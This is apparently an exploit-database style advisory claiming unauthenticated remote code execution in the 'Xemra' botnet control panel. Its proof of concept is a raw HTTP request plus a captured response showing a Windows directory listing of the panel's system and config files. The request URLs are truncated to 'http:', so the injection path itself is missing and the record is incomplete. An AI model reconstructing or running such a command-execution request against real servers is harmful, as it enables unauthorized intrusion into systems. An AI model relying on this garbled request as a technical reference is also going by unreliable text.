##########################################################################
# Exploit Title: Xemra Botnet Remote Code Execution Vulnerability
# Date: 13.12.2013
# Exploit Author: GalaxyAndroid
# Vendor Homepage: unkn0wn
# Software Link: http:
# Version: unknown
# Tested on: Windows 7 with Xampp
# greets goes to: ChrisKSK, Protestants in Ukraine -> keep pushing!
# no greets to: NSA, GCHQ, USA, AUS, CAN, GBR, NZL
#################################Exploit-Code###################################
PoC execute dir Command. No authentication needed!
#########
GET http:
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cache-Control: max-age=0
############
Response:
HTTP/1.1 200 OK
Date: Fri, 13 Dec 2013 18:29:42 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 685
<h1>cmd</h1><pre> Datenträger in Laufwerk C: ist
Verzeichnis von C:\xampp\htdocs\xemra\system
13.12.2013 19:16 <DIR> .
13.12.2013 19:16 <DIR> ..
18.04.2012 22:09 646 base.class.php
26.11.2011 13:47 88 command.php
18.05.2012 08:11 277 config.include.php
18.04.2012 22:09 1.348 database.class.php
13.12.2013 19:16 <DIR> geoip
18.04.2012 22:09 694 global.php
18.04.2012 22:09 1.725 session.class.php
6 Datei(en), 4.778 Bytes
3 Verzeichnis(se), 66.773.762.048 Bytes frei
